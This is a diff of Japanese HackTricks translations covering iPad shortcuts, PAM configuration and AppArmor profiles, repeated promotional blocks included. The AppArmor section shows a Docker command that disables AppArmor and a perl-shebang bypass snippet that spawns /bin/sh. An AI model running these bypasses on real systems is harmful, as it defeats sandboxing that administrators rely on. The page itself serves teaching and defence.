| ⌘R | 現在のタブを更新 |
|
||||
| ⌘. | 現在のタブの読み込みを停止 |
|
||||
| ⌘⌥F (Command-Option/Alt-F) | メールボックス内を検索 |
|
||||
| ショートカット | アクション |
|
||||
| ----------------------- | -------------------------- |
|
||||
| ⌘L | ロケーションを開く |
|
||||
| ⌘T | 新しいタブを開く |
|
||||
| ⌘W | 現在のタブを閉じる |
|
||||
| ⌘R | 現在のタブを更新する |
|
||||
| ⌘. | 現在のタブの読み込みを停止する |
|
||||
| ⌘⌥F (Command-Option/Alt-F) | メールボックス内を検索する |
|
||||
|
||||
# 参考文献
|
||||
|
||||
|
@ -300,13 +300,13 @@ iPadキーボードまたはUSBキーボードアダプターを持っている
|
|||
* [http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html](http://www.iphonehacks.com/2018/03/ipad-keyboard-shortcuts.html)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンであり、企業やその顧客が**盗聴マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンであり、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
|
||||
|
@ -314,14 +314,14 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE(HackTricks AWS Red Team Expert)**でAWSハッキングをゼロからヒーローまで学ぶ!</summary>
|
||||
<summary><strong>**htARTE(HackTricks AWS Red Team Expert)**で**ゼロからヒーローまでのAWSハッキング**を学びましょう!</summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* **HackTricksをPDFでダウンロード**したり、**HackTricksで企業を宣伝**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする。
|
||||
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出して、あなたのハッキングトリックを共有してください。
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする
|
||||
* **HackTricks**と[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks)のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
|
||||
|
||||
</details>
|
||||
|
|
|
@ -6,19 +6,19 @@ HackTricksをサポートする他の方法:
|
|||
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
|
||||
- **ハッキングトリックを共有するためにPRを提出して** [**HackTricks**](https://github.com/carlospolop/hacktricks) と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリに
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**または[telegramグループ](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**する
|
||||
- **ハッキングトリックを共有するには、[HackTricks](https://github.com/carlospolop/hacktricks)と[HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください**
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかを確認する**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
|
||||
|
@ -35,7 +35,7 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
- **SolarisおよびUNIXベースのシステム**は通常、`/etc/pam.conf`にある中央の設定ファイルを使用します。
|
||||
- **Linuxシステム**はディレクトリアプローチを好み、サービス固有の設定を`/etc/pam.d`内に保存します。たとえば、ログインサービスの設定ファイルは`/etc/pam.d/login`にあります。
|
||||
|
||||
ログインサービスのPAM設定の例は次のようになります:
|
||||
ログインサービスのPAM構成の例は次のようになります:
|
||||
```text
|
||||
auth required /lib/security/pam_securetty.so
|
||||
auth required /lib/security/pam_nologin.so
|
||||
|
@ -50,16 +50,16 @@ session required /lib/security/pam_unix_session.so
|
|||
```
|
||||
### **PAM管理領域**
|
||||
|
||||
これらの領域、または管理グループには、**auth**、**account**、**password**、**session**が含まれます。それぞれが認証およびセッション管理プロセスの異なる側面に責任を持ちます:
|
||||
これらの領域、または管理グループには、**auth**、**account**、**password**、**session**が含まれ、それぞれ認証およびセッション管理プロセスの異なる側面に責任を持ちます:
|
||||
|
||||
- **Auth**: ユーザーのアイデンティティを検証し、しばしばパスワードの入力を求めます。
|
||||
- **Account**: アカウントの検証を処理し、グループメンバーシップや特定の時間帯の制限などの条件をチェックします。
|
||||
- **Password**: 複雑さのチェックや辞書攻撃の防止など、パスワードの更新を管理します。
|
||||
- **Session**: サービスセッションの開始や終了時にアクションを管理し、ディレクトリのマウントやリソース制限の設定などを行います。
|
||||
- **Session**: サービスセッションの開始や終了時にディレクトリのマウントやリソース制限の設定など、アクションを管理します。
|
||||
|
||||
### **PAMモジュールの制御**
|
||||
|
||||
制御は、モジュールの成功または失敗に対する応答を決定し、全体的な認証プロセスに影響を与えます。これには以下が含まれます:
|
||||
制御は、モジュールの成功または失敗に対する応答を決定し、全体的な認証プロセスに影響を与えます。これには次のものが含まれます:
|
||||
|
||||
- **Required**: 必須モジュールの失敗は最終的に失敗につながりますが、すべての後続モジュールがチェックされた後にのみ失敗します。
|
||||
- **Requisite**: 失敗時にプロセスが直ちに終了します。
|
||||
|
@ -68,35 +68,35 @@ session required /lib/security/pam_unix_session.so
|
|||
|
||||
### シナリオ例
|
||||
|
||||
複数の認証モジュールが設定されている場合、プロセスは厳密な順序に従います。`pam_securetty`モジュールがログイン端末を認証できないと判断した場合、rootログインがブロックされますが、その後もすべてのモジュールが処理されます。`pam_env`は環境変数を設定し、ユーザーエクスペリエンスの向上に役立ちます。`pam_ldap`および`pam_unix`モジュールはユーザーの認証に協力し、`pam_unix`は以前に提供されたパスワードを使用しようとします。これにより、認証方法の効率性と柔軟性が向上します。
|
||||
複数の認証モジュールがあるセットアップでは、プロセスは厳密な順序に従います。`pam_securetty`モジュールがログイン端末を認証できないと判断した場合、rootログインがブロックされますが、その「必須」ステータスのため、すべてのモジュールが処理されます。`pam_env`は環境変数を設定し、ユーザーエクスペリエンスの向上に役立つ可能性があります。`pam_ldap`および`pam_unix`モジュールはユーザーの認証に協力し、`pam_unix`は以前に提供されたパスワードを使用しようとします。これにより、認証方法の効率性と柔軟性が向上します。
|
||||
|
||||
## 参考文献
|
||||
* [https://hotpotato.tistory.com/434](https://hotpotato.tistory.com/434)
|
||||
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンであり、企業やその顧客が**スティーラーマルウェア**によって**侵害**されていないかをチェックするための**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトを訪れて、**無料**でエンジンを試すことができます:
|
||||
彼らのウェブサイトをチェックし、**無料**でエンジンを試すことができます:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>**htARTE(HackTricks AWS Red Team Expert)**で**ゼロからヒーローまでのAWSハッキング**を学びましょう!</summary>
|
||||
<summary><strong>ゼロからヒーローまでのAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksの広告を掲載したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手してください
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションをご覧ください
|
||||
* 💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**telegramグループ**](https://t.me/peass)に**参加**するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)を**フォロー**してください。
|
||||
* **HackTricks**と**HackTricks Cloud**のgithubリポジトリにPRを提出することで、あなたのハッキングトリックを共有してください。
|
||||
* **HackTricksで企業を宣伝したい**、または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手する
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)をフォローする
|
||||
* **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングトリックを共有する
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,23 +4,23 @@
|
|||
|
||||
<summary><strong>ゼロからヒーローまでAWSハッキングを学ぶ</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE(HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks をサポートする他の方法:
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) をチェック!
|
||||
* [**公式PEASS&HackTricksグッズ**](https://peass.creator-spring.com)を入手
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な [**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)** に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする。
|
||||
* **HackTricks** と [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
|
||||
- **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
- [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する
|
||||
- [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける
|
||||
- **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)をフォローする
|
||||
- **HackTricks**および**HackTricks Cloud**のGitHubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) は、**ダークウェブ**を活用した検索エンジンで、**企業やその顧客が** **スティーラーマルウェア**によって**侵害**されているかどうかをチェックするための**無料**機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃に対抗することです。
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
彼らのウェブサイトをチェックして、**無料**でエンジンを試すことができます:
|
||||
|
||||
|
@ -30,26 +30,26 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
## 基本情報
|
||||
|
||||
AppArmor は、**プログラムごとのプロファイルを介してプログラムが利用できるリソースを制限するように設計されたカーネルの拡張機能**であり、アクセス制御属性をユーザーではなくプログラムに直接結びつけることで、強制アクセス制御(MAC)を効果的に実装しています。このシステムは、**プロファイルをカーネルにロード**して動作し、これらのプロファイルは、ネットワーク接続、生のソケットアクセス、ファイルアクセスなど、プログラムがアクセスできるリソースを指示します。
|
||||
AppArmorは、**プログラムごとのプロファイルを介してプログラムが利用できるリソースを制限するように設計されたカーネルの拡張機能**であり、アクセス制御属性をユーザーではなくプログラムに直接結びつけることで、強制アクセス制御(MAC)を効果的に実装しています。このシステムは、**プロファイルをカーネルにロード**して動作し、これらのプロファイルは、ネットワーク接続、生のソケットアクセス、ファイルアクセス権限など、プログラムがアクセスできるリソースを指示します。
|
||||
|
||||
AppArmor プロファイルには、次の2つの動作モードがあります:
|
||||
AppArmorプロファイルには、次の2つの動作モードがあります:
|
||||
|
||||
- **強制モード**:このモードは、プロファイルで定義されたポリシーを積極的に強制し、これらのポリシーに違反するアクションをブロックし、syslog や auditd などのシステムを介してこれらを侵害しようとする試みを記録します。
|
||||
- **クレームモード**:強制モードとは異なり、クレームモードではプロファイルのポリシーに違反するアクションをブロックしません。代わりに、これらの試みをポリシー違反としてログに記録しますが、制限を強制しません。
|
||||
- **強制モード**:このモードは、プロファイルで定義されたポリシーを積極的に強制し、これらのポリシーに違反するアクションをブロックし、syslogやauditdなどのシステムを介してこれらを侵害しようとする試みを記録します。
|
||||
- **クレームモード**:強制モードとは異なり、クレームモードはプロファイルのポリシーに違反するアクションをブロックしません。代わりに、これらの試みをポリシー違反として記録しますが、制限を強制しません。
|
||||
|
||||
### AppArmor の構成要素
|
||||
### AppArmorの構成要素
|
||||
|
||||
- **カーネルモジュール**:ポリシーの強制を担当します。
|
||||
- **ポリシー**:プログラムの動作とリソースアクセスのルールと制限を指定します。
|
||||
- **パーサー**:ポリシーをカーネルにロードして強制または報告します。
|
||||
- **ユーティリティ**:AppArmor とのやり取りと管理のためのインターフェースを提供するユーザーモードプログラムです。
|
||||
- **ユーティリティ**:これらは、AppArmorとのやり取りと管理のためのインターフェースを提供するユーザーモードプログラムです。
|
||||
|
||||
### プロファイルのパス
|
||||
|
||||
AppArmor プロファイルは通常、_**/etc/apparmor.d/**_ に保存されます。\
|
||||
`sudo aa-status` を使用すると、いくつかのプロファイルに制限がかけられているバイナリをリストアップできます。リストされた各バイナリのパスのスラッシュ "/" をドットに変更すると、言及されたフォルダ内の apparmor プロファイルの名前が取得できます。
|
||||
AppArmorプロファイルは通常、_**/etc/apparmor.d/**_に保存されます。\
|
||||
`sudo aa-status`を使用すると、いくつかのプロファイルに制限がかけられているバイナリをリストアップできます。リストされた各バイナリのパスのスラッシュ"/"をドットに変更すると、言及されたフォルダ内のapparmorプロファイルの名前が取得できます。
|
||||
|
||||
たとえば、_/usr/bin/man_ の **apparmor** プロファイルは _/etc/apparmor.d/usr.bin.man_ にあります。
|
||||
たとえば、_**/usr/bin/man**_の**apparmor**プロファイルは、_**/etc/apparmor.d/usr.bin.man**_にあります。
|
||||
|
||||
### コマンド
|
||||
```bash
|
||||
|
@ -63,23 +63,23 @@ aa-mergeprof #used to merge the policies
|
|||
```
|
||||
## プロファイルの作成
|
||||
|
||||
* 影響を受ける実行可能ファイルを示すために、**絶対パスとワイルドカード**が許可されています(ファイルグロブを使用するため)。
|
||||
* **ファイル**に対するバイナリのアクセスを示すために、以下の**アクセス制御**が使用できます:
|
||||
* **r**(読み取り)
|
||||
* **w**(書き込み)
|
||||
* **m**(実行可能としてメモリマップ)
|
||||
* **k**(ファイルロック)
|
||||
* **l**(ハードリンクの作成)
|
||||
* **ix**(新しいプログラムで別のプログラムを実行し、ポリシーを継承)
|
||||
* **Px**(環境をクリーンアップした後、別のプロファイルで実行)
|
||||
* **Cx**(環境をクリーンアップした後、子プロファイルで実行)
|
||||
* **Ux**(環境をクリーンアップした後、無制限に実行)
|
||||
* **プロファイル内で変数**を定義し、プロファイルの外部から操作できます。例:@{PROC} および @{HOME}(プロファイルファイルに #include \<tunables/global> を追加)
|
||||
* **許可ルールを上書きするために拒否ルールがサポート**されています。
|
||||
- 影響を受ける実行可能ファイルを示すために、**絶対パスとワイルドカード**が許可されています(ファイルグロブを使用するため)。
|
||||
- **ファイル**に対するバイナリのアクセスを示すために、以下の**アクセス制御**を使用できます:
|
||||
- **r**(読み取り)
|
||||
- **w**(書き込み)
|
||||
- **m**(実行可能としてメモリマップ)
|
||||
- **k**(ファイルロック)
|
||||
- **l**(ハードリンクの作成)
|
||||
- **ix**(新しいプログラムがポリシーを継承して別のプログラムを実行する)
|
||||
- **Px**(環境をクリーンアップした後、別のプロファイルで実行)
|
||||
- **Cx**(環境をクリーンアップした後、子プロファイルで実行)
|
||||
- **Ux**(環境をクリーンアップした後、無制限に実行)
|
||||
- **プロファイル内で変数**を定義し、プロファイル外から操作することができます。例:@{PROC} および @{HOME}(プロファイルファイルに #include \<tunables/global> を追加します)
|
||||
- **許可ルールを上書きするために拒否ルールがサポート**されています。
|
||||
|
||||
### aa-genprof
|
||||
|
||||
簡単にプロファイルの作成を開始するために、apparmor が役立ちます。**バイナリによって実行されるアクションを apparmor に検査させ、その後、許可または拒否するアクションを決定できます**。\
|
||||
簡単にプロファイルを作成するために、apparmor が役立ちます。**バイナリによって実行されるアクションを apparmor に検査させ、その後、許可または拒否するアクションを決定できます**。\
|
||||
次のコマンドを実行するだけです:
|
||||
```bash
|
||||
sudo aa-genprof /path/to/binary
|
||||
|
@ -123,7 +123,7 @@ sudo aa-easyprof /path/to/binary
|
|||
```bash
|
||||
sudo apparmor_parser -a /etc/apparmor.d/path.to.binary
|
||||
```
|
||||
### ログからプロファイルを変更する
|
||||
### ログからプロファイルを修正する
|
||||
|
||||
次のツールはログを読み取り、ユーザーに検出された禁止されたアクションのうち許可するものがあるかどうかを尋ねます:
|
||||
```bash
|
||||
|
@ -148,7 +148,7 @@ apparmor_parser -R /etc/apparmor.d/profile.name #Remove profile
|
|||
type=AVC msg=audit(1610061880.392:286): apparmor="AUDIT" operation="getattr" profile="/bin/rcat" name="/dev/pts/1" pid=954 comm="service_bin" requested_mask="r" fsuid=1000 ouid=1000
|
||||
type=AVC msg=audit(1610061880.392:287): apparmor="DENIED" operation="open" profile="/bin/rcat" name="/etc/hosts" pid=954 comm="service_bin" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
|
||||
```
|
||||
以下の情報も取得できます:
|
||||
以下の方法でもこの情報を取得できます:
|
||||
```bash
|
||||
sudo aa-notify -s 1 -v
|
||||
Profile: /bin/service_bin
|
||||
|
@ -166,7 +166,7 @@ Logfile: /var/log/audit/audit.log
|
|||
AppArmor denials: 2 (since Wed Jan 6 23:51:08 2021)
|
||||
For more information, please see: https://wiki.ubuntu.com/DebuggingApparmor
|
||||
```
|
||||
## DockerにおけるApparmor
|
||||
## DockerのApparmor
|
||||
|
||||
デフォルトでDockerのプロファイル**docker-profile**がロードされていることに注意してください:
|
||||
```bash
|
||||
|
@ -189,7 +189,7 @@ docker-default
|
|||
**docker-defaultプロファイルの概要**:
|
||||
|
||||
- すべての**ネットワーキング**への**アクセス**
|
||||
- **権限**は定義されていません(ただし、一部の権限は基本的なベースルールを含めることで得られます、つまり#include \<abstractions/base>)
|
||||
- **権限**は定義されていません(ただし、一部の権限は基本的なベースルールを含むことによって提供されます、つまり#include \<abstractions/base>)
|
||||
- 任意の**/proc**ファイルへの**書き込み**は**許可されていません**
|
||||
- 他の/**proc**および/**sys**の**サブディレクトリ**/**ファイル**への読み取り/書き込み/ロック/リンク/実行アクセスは**拒否されます**
|
||||
- **マウント**は**許可されていません**
|
||||
|
@ -200,23 +200,23 @@ Dockerコンテナを**実行**すると、次の出力が表示されるはず
|
|||
1 processes are in enforce mode.
|
||||
docker-default (825)
|
||||
```
|
||||
注意してください。デフォルトでは、**apparmor はさえコンテナに付与された権限をブロック**します。たとえば、**SYS\_ADMIN 権限が付与されている場合でも、/proc への書き込み権限をブロック**することができます。なぜなら、デフォルトでは Docker の apparmor プロファイルがこのアクセスを拒否するからです。
|
||||
注意してください。デフォルトでは、**apparmorはコンテナに付与された権限でさえもブロック**します。たとえば、**SYS_ADMIN権限が付与**されていても、デフォルトではdockerのapparmorプロファイルがこのアクセスを拒否するため、**/proc内に書き込む権限をブロック**することができます。
|
||||
```bash
|
||||
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined ubuntu /bin/bash
|
||||
echo "" > /proc/stat
|
||||
sh: 1: cannot create /proc/stat: Permission denied
|
||||
```
|
||||
必要なら、AppArmorの制限をバイパスするために**AppArmorを無効にする**必要があります。
|
||||
Apparmorの制限をバイパスするために、**Apparmorを無効にする**必要があります。
|
||||
```bash
|
||||
docker run -it --cap-add SYS_ADMIN --security-opt seccomp=unconfined --security-opt apparmor=unconfined ubuntu /bin/bash
|
||||
```
|
||||
デフォルトでは、**AppArmor** はコンテナがSYS\_ADMIN機能を持っていても、内部からフォルダをマウントすることを**禁止します**。
|
||||
デフォルトでは、**AppArmor** はコンテナがSYS_ADMIN機能を持っていても、内部からフォルダをマウントすることを**禁止します**。
|
||||
|
||||
**capabilities**をdockerコンテナに**追加/削除**することができます(これは**AppArmor**や**Seccomp**などの保護方法によって引き続き制限されます):
|
||||
dockerコンテナに**capabilities**を**追加/削除**できることに注意してください(これは**AppArmor**や**Seccomp**などの保護方法によって引き続き制限されます):
|
||||
|
||||
- `--cap-add=SYS_ADMIN` は `SYS_ADMIN` 機能を与えます
|
||||
- `--cap-add=ALL` はすべての機能を与えます
|
||||
- `--cap-drop=ALL --cap-add=SYS_PTRACE` はすべての機能を削除し、`SYS_PTRACE` のみを与えます
|
||||
- `--cap-add=SYS_ADMIN` は `SYS_ADMIN` 機能を付与します
|
||||
- `--cap-add=ALL` はすべての機能を付与します
|
||||
- `--cap-drop=ALL --cap-add=SYS_PTRACE` はすべての機能を削除し、`SYS_PTRACE` のみを付与します
|
||||
|
||||
{% hint style="info" %}
|
||||
通常、**docker**コンテナ内で**特権機能**が利用可能であることがわかった場合でも、**exploit**の一部が機能しない場合は、docker **apparmor がそれを防いでいる**可能性があります。
|
||||
|
@ -234,12 +234,12 @@ deny /etc/* w, # deny write for all files directly in /etc (not in a subdir)
|
|||
```
|
||||
sudo apparmor_parser -r -W mydocker
|
||||
```
|
||||
プロファイルをリストするには、以下のコマンドを使用できます。以下のコマンドは、私の新しいAppArmorプロファイルをリストしています。
|
||||
プロファイルをリストするには、以下のコマンドを使用します。以下のコマンドは、私の新しいAppArmorプロファイルをリストしています。
|
||||
```
|
||||
$ sudo apparmor_status | grep mydocker
|
||||
mydocker
|
||||
```
|
||||
以下のように、「/etc/」を変更しようとするとエラーが発生します。これは、AppArmorプロファイルが「/etc/」への書き込みアクセスを防いでいるためです。
|
||||
以下のように、AppArmorプロファイルが「/etc/」への書き込みアクセスを防いでいるため、「/etc/」を変更しようとするとエラーが発生します。
|
||||
```
|
||||
$ docker run --rm -it --security-opt apparmor:mydocker -v ~/haproxy:/localhost busybox chmod 400 /etc/hostname
|
||||
chmod: /etc/hostname: Permission denied
|
||||
|
@ -262,7 +262,7 @@ find /etc/apparmor.d/ -name "*lowpriv*" -maxdepth 1 2>/dev/null
|
|||
|
||||
### AppArmor Shebang Bypass
|
||||
|
||||
[**このバグ**](https://bugs.launchpad.net/apparmor/+bug/1911431)では、**特定のリソースでperlの実行を防いでいる場合でも**、最初の行に**`#!/usr/bin/perl`**を指定したシェルスクリプトを作成し、**ファイルを直接実行**すると、任意のコマンドを実行できることが示されています。例:
|
||||
[**このバグ**](https://bugs.launchpad.net/apparmor/+bug/1911431)では、**特定のリソースでperlの実行を防いでいる場合でも**、最初の行に**`#!/usr/bin/perl`**を指定したシェルスクリプトを作成し、そのファイルを直接**実行**すると、任意のコマンドを実行できることが示されています。例:
|
||||
```perl
|
||||
echo '#!/usr/bin/perl
|
||||
use POSIX qw(strftime);
|
||||
|
@ -272,11 +272,11 @@ exec "/bin/sh"' > /tmp/test.pl
|
|||
chmod +x /tmp/test.pl
|
||||
/tmp/test.pl
|
||||
```
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**盗難マルウェア**によって**侵害**されていないかをチェックする**無料**の機能を提供しています。
|
||||
[**WhiteIntel**](https://whiteintel.io)は、**ダークウェブ**を活用した検索エンジンで、企業やその顧客が**スティーラーマルウェア**によって**侵害**されているかどうかをチェックする**無料**の機能を提供しています。
|
||||
|
||||
WhiteIntelの主な目標は、情報窃取マルウェアによるアカウント乗っ取りやランサムウェア攻撃と戦うことです。
|
||||
|
||||
|
@ -290,10 +290,10 @@ WhiteIntelの主な目標は、情報窃取マルウェアによるアカウン
|
|||
|
||||
HackTricksをサポートする他の方法:
|
||||
|
||||
* **HackTricksで企業を宣伝したり、HackTricksをPDFでダウンロードしたり**したい場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* **HackTricksで企業を宣伝したり、HackTricksをPDFでダウンロードしたり**する場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください!
|
||||
* [**公式PEASS&HackTricksスウォッグ**](https://peass.creator-spring.com)を手に入れる
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[NFTs](https://opensea.io/collection/the-peass-family)のコレクションを見つける
|
||||
* **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**をフォローする。**
|
||||
